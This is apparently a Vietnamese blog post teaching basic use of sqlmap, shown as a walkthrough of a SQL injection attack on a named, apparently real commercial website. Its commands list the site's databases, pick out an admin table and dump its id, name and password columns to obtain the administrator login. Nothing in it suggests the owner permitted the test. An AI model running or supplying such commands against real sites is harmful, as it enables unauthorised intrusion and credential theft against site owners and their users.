SQLMAP CƠ BẢN
http://autohoabinh.com/?page=products_detail&id=296&catid=2'
Vào thư mục chưa bộ công cụ sqlmap
cd /pentest/database/sqlmap/
đầu tiên ta get database nhé
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs
ở đây --dbs là databases
thêm 1 số cái nữa như
--dbs DBMS databases
--tables DBMS database tables
--columns DBMS database table columns
--schema DBMS schema
--dump dump dữ liệu
Database nhận đc là athb_db nhé.
tiếp tục ta get các table như sau
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db --tables
table tbl_admin là table chúng ta cần khai thác đúng hok nào,giờ ta lấy các column nhé
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin --columns
kết quả nhận đc như sau
bây giờ ta sẽ dump các trường id,name và pass nhé.ta dump trường id trước nào
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C id --dump
kết quả nhận đc là id ->1 .tương tự ta dump các trường còn lại
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C name --dump
kết quả nhận đc thì user là admin nhé
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C pass --dump
No comments:
Post a Comment